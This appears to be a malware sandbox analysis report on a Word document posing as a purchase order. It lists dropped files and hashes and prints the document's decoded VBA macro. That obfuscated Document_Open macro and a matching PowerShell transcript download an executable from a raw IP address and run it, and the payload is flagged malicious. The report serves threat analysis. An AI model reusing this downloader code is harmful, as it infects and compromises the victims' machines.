Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T05:41:17">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B54863EA-DCB1-40F2-82C0-0033BFBBA29B}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18828
Entropy (8bit):	5.5955983431308
Encrypted:	false
SSDEEP:	384:CtktGhboztaZpjCH/sAmESBKnCulzItq7Y94SJUeRVsBMDJ8VIYiq:otZpjCHUY4KCulzSCXehDJ8T9
MD5:	8174136751F99393637FA90D730B6DEA
SHA1:	EAD0E1BCA809316BEE905A39C81A614941A69E13
SHA-256:	33EEC1E1498A9A515B22C52CB5A038427287865D337842EE7DC6F6F3D680148B
SHA-512:	5E8D7FEC208E5DAA851379FF3893BE4DBF5336F1FEED2419C367DDD84ADC85E7CBC11EB57CD0C14E4C7BDCBEB934D6B8BCE4B62309BABA8DEC65D35218CB229C
Malicious:	false
Reputation:	low
Preview:	@...e.......................W.E.......k.!............@..........H...............<@.^.L."My...:I..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyghfd3f.ne3.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlxsqdho.sxz.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\nothinglittle.exe Download File
Process:	C:\Users\Public\Documents\nothinglittle.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	533488
Entropy (8bit):	7.949126101574067
Encrypted:	false
SSDEEP:	12288:A4tWKG1Gu7iTQezjBwaxITEI3ENCYyuqoTGYA6TJqiU1:A4tc1Gu7KzurgI3FBOAmqb1
MD5:	3C88C6EF1A906BC81FC6B5B7FC478E0C
SHA1:	1007EA59D9C209F367A1873AE6DA2EAC5FAD81EF
SHA-256:	1754283E0B6BBBBEB69F165E54E3795D3E34CA14AA7BD8BD3B7DCDD97F7DFCA8
SHA-512:	87841B94DB9F67D856CBCC4E14BE6AB56716FFFCA161ADCF23EA5931ED3A2843C5207004E0E5AE7E9E764D9D2825993E2565BE10600134B89677F7734457A0F0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 26%, Browse Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.i...............0......J........... ........@.. .......................`............@.....................................S........F...............'...@......l................................................ ............... ..H............text....... ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B........................H..................&..................................................(1.....(....(...........s....o......}.....0..F.......(....r...po.....s.......o....(.....o....o........,..o......,..o.................0..........:.......~.............0..'..........+. ....(......Y..-.s....o.....{.......(......{...."..}......{...."..}....>..(......(......{...."..}......{...."..}....>..(......(......(.0..b........s......s.....r9..p.o.........(....(....r]..p.o.........(...

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFL_PO 69002.doc.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Fri Jun 11 13:41:17 2021, atime=Fri Jun 11 13:41:14 2021, length=428544, window=hide
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	4.733614133302886
Encrypted:	false
SSDEEP:	24:816whO3hK6AkasD0S7aB6my16whO3hK6AkasD0S7aB6m:8rAxqk+DB6prAxqk+DB6
MD5:	326DA33472BCE1E3DDFC01C7DF3E2B4A
SHA1:	55CDBA308D2A068035C7682BE8CB698B9C6FE9EE
SHA-256:	61ECC0B69CCF39C58EE724609E4E94FD51718265DA3B325A37EDA0F89BABAF3F
SHA-512:	5B0EEF294BBB23CFF9243EEAA92F11CCCA3726F92652D695F38DD547856685C1FFD8933723A3C4C12AF736C21F9F3C2B4F8823BD85009538A400C5DC5264750A
Malicious:	true
Preview:	L..................F.... ...d..:...+.+..^..t.I..^...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R#u....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R#u.....S.....................,Q.h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..R#u.....Y..............>.....Y7..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2......R(u .RFL_PO~1.DOC..R......>Qvx.R(u....h.........................R.F.L._.P.O. .6.9.0.0.2...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\RFL_PO 69002.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.L._.P.O. .6.9.0.0.2...d.o.c.........:..,.LB.)...As...`.......X.......061544...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.348872575402326
Encrypted:	false
SSDEEP:	3:M1w3pbBCvQ13pbBCmX1w3pbBCv:MG3BBWg3BBe3BBs
MD5:	FD08BA3815DD637EF453DAC8CECE58B1
SHA1:	C8A49EFC89DA0F191D9ADE78F87E2EBDA9FB489E
SHA-256:	BC7C82D01FA1956ABB9DE65B449D64764AEFA4DCED9C6562E1E486EC203213B2
SHA-512:	B7476D12D4F79102791E307D45BF96DFCA28DECFA5C08E0A2F95761C9485B7CEB6F6E4AA7236589E29A0C8EF6EC6C57229754BE94820FA512BB54A970D20A5D3
Malicious:	false
Preview:	[doc]..RFL_PO 69002.doc.LNK=0..RFL_PO 69002.doc.LNK=0..[doc]..RFL_PO 69002.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2195042105075045
Encrypted:	false
SSDEEP:	3:Rl/ZdlUixlqKF0j9lqKB5r:RtZci+eJa1
MD5:	3DB29F99C92EAE09D66E7956176941F9
SHA1:	EFFBE8C1E324025C9D2A2A5CE33984176119E3AD
SHA-256:	4CDF8B60D17CCF48A34A2AEEF85CDEFF523EB6703384E1A93D6CD789035786EB
SHA-512:	EE5C4DB284BB1B8DF5381BACF78EF0760C45BBDFC3987A2BD302E14ABF8B8FCC78D33635AC08261179834B5CA98139B69806AC39890317F9F8ACCFD2D5E69223
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h............c............$.......6C.........c............$.......6C.........c................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7MKASODXYUB7NTL3O4Z.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.75232480485457
Encrypted:	false
SSDEEP:	48:I4gwKGj6oyeCGUHfS81jYukvhkvklCywyxjGH1TSogZoVkDGH1TSogZoVQH:InwKXaC//51FkvhkvCCtyp0oHiC0oHiI
MD5:	FD8B140321A3D215CADA531B2CFAFD87
SHA1:	71F68840933522AF429F7C5C8659368C00A970B1
SHA-256:	EE6A71778B66C799BEF3D410C77B7FDD41F392F7716EEAA87C7024050EFE2565
SHA-512:	53B4083FB5FAC0973ED1A669B6B7D4B162AD9F0CB4D1057DCF1C55B576E8E16FBC6C725B349214CA49D1F1C725D88D1EF129DD3448C05BAEC9E9035B20E933CD
Malicious:	false
Preview:	...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..&...:........^......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..R#u.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..R$u.....Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..R$u.....Y........................M.i.c.r.o.s.o.f.t.....V.1.....>Qwx..Windows.@.......Ny..R)u.....Y.....................,Q.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny.>Q\x.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny.>Q\x.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.>Q.v.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

C:\Users\user\Desktop\~$L_PO 69002.doc Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2195042105075045
Encrypted:	false
SSDEEP:	3:Rl/ZdlUixlqKF0j9lqKB5r:RtZci+eJa1
MD5:	3DB29F99C92EAE09D66E7956176941F9
SHA1:	EFFBE8C1E324025C9D2A2A5CE33984176119E3AD
SHA-256:	4CDF8B60D17CCF48A34A2AEEF85CDEFF523EB6703384E1A93D6CD789035786EB
SHA-512:	EE5C4DB284BB1B8DF5381BACF78EF0760C45BBDFC3987A2BD302E14ABF8B8FCC78D33635AC08261179834B5CA98139B69806AC39890317F9F8ACCFD2D5E69223
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h............c............$.......6C.........c............$.......6C.........c................

C:\Users\user\Documents\20210611\PowerShell_transcript.061544._jjnsaz8.20210611074123.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.212967208212417
Encrypted:	false
SSDEEP:	24:BxSAHxvBn6x2DOXUWV+Wzxd/ucd/zWdaHjeTKKjX4CIym1ZJX1f+Wzxd/ucd/1ns:BZRvh6oO1+KGhdaqDYB1Zf+KGCZZA
MD5:	41198D89573FF81DF8946718A0BE7FFF
SHA1:	F2B1566B8BB857B5D146425D3005AF284B44F1A4
SHA-256:	09ED80C09E98F4397651FD1795FC28A75A101DA9032E1212033B7E56FCA6335A
SHA-512:	AB5F58ABB65094F3A08B7C4A4B68DB6272826DBF3FBA1ED9E3170789E549E2841F3227D3B26F342EB709D5AAD541B03F16FD8DC5ABFB4B84742E826F3E0CB79A
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210611074135..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h Start-BitsTransfer -Source http://31.210.20.45/1xBet/RFL_0769002.exe -Destination C:\Users\Public\Documents\nothinglittle.exe;C:\Users\Public\Documents\nothinglittle.exe..Process ID: 4220..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210611074135..********************..PS>Start-BitsTransfer -Source http://31.210.20.45/1xBet/RFL_0769002.exe -Destination C:\Users\Public\Documents\nothinglittle.exe;C:\Users\P

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Template: Normal.dotm, Last Saved By: Dell, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Jun 10 09:54:00 2021, Last Saved Time/Date: Thu Jun 10 09:55:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	7.856503203160727
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	RFL_PO 69002.doc
File size:	426496
MD5:	ee4431e2c986dcac3fc8078c674ba65e
SHA1:	64aa75122963e38f52739ba819788e4bfcfb3651
SHA256:	4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
SHA512:	6de5ce6da2e111931a2dc40ded7b23c2754503b4340b0492ce68ff0480b0e3727f0697a1772ef106e194194e9e0d96916efe6296e8963819544d2d2effdfb618
SSDEEP:	12288:hlhcQMEUElwvXxKDe2YqREMm1vRm3d+QxHd5NK:vXUvvXSe27etQ3dv9m
File Content Preview:	........................>.......................-...........0...............&...'...(...)...*...+...,..........................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "RFL_PO 69002.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	Dell
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Dell
Revion Number:	5
Total Edit Time:	60
Create Time:	2021-06-10 08:54:00
Last Saved Time:	2021-06-10 08:55:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 993

General
Stream Path:	Macros/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	993
Data ASCII:	. . . . . . . . . z . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ab 34 9c e4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
physicaldark()
Attribute
VB_Name
Macro
physicaldark

VBA Code
`Attribute VB_Name = "Module1" Sub physicaldark() ' ' physicaldark Macro ' 1Y9EPHD78LD1 ' End Sub`

VBA File Name: ThisDocument.cls, Stream Size: 1786

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1786
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . 4 . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 0b 03 00 00 2b 05 00 00 00 00 00 00 01 00 00 00 ab 34 d7 47 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
";C:\Users\Public\Documents\nothinglittle.ex"
-Destination
"C:\Users\Public\Documents\nothinglittle.ex"
VB_Name
VB_Creatable
CreateObject("wscript.s"
VB_Exposed
calllife).Run(insidewith
rememberhead
Start-Bit"
"hell"
VB_Customizable
-Source
"Transfer
insidewith
Document_Open()
VB_TemplateDerived
"ThisDocument"
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
"powers"
VB_Base
calllife

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
insidewith = "powers"
calllife = "hell"
rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.243799209562
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.45311151175
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6987

General
Stream Path:	1Table
File Type:	data
Stream Size:	6987
Entropy:	5.8885032044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 392814

General
Stream Path:	Data
File Type:	data
Stream Size:	392814
Entropy:	7.9926896989
Base64 Encoded:	True
Data ASCII:	n . . . D . d . . . . . . . . . . . . . . . . . . . . . . . x " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . C . . . & . . . . A . . . . . . . . . . . . . . . . . . . . . . 0 . 1 . 0 . 1 . 0 . 1 . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . = . . . z . . . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . . . . . = . . . z . . . . . . P N G . . . . . . . . I H D R . . . . . . . L . . . . . } . . . . . . .
Data Raw:	6e fe 05 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 2e 78 22 11 03 11 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 26 00 00 00 04 41 01 00 00 00 05 c1 0e 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 30 00 31 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	410
Entropy:	5.35778177907
Base64 Encoded:	True
Data ASCII:	I D = " { 5 D 6 5 F 4 3 D - 2 7 0 A - 4 8 3 B - 8 F A 4 - C B 6 D D 3 F 5 B D 6 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 B 2 9 0 B 6 A 2 A 6 E 2 A 6 E 2 A 6 E 2 A 6 E " . . D P B = " 4 E 4 C 6 E 4 F B 2 5 1 D 4 5 2 D 4 5 2 D 4 " . . G C = " 7 1 7 3 5 1 9 2 5 2 9 2 5 2 6 D " . . . . [ H o s t
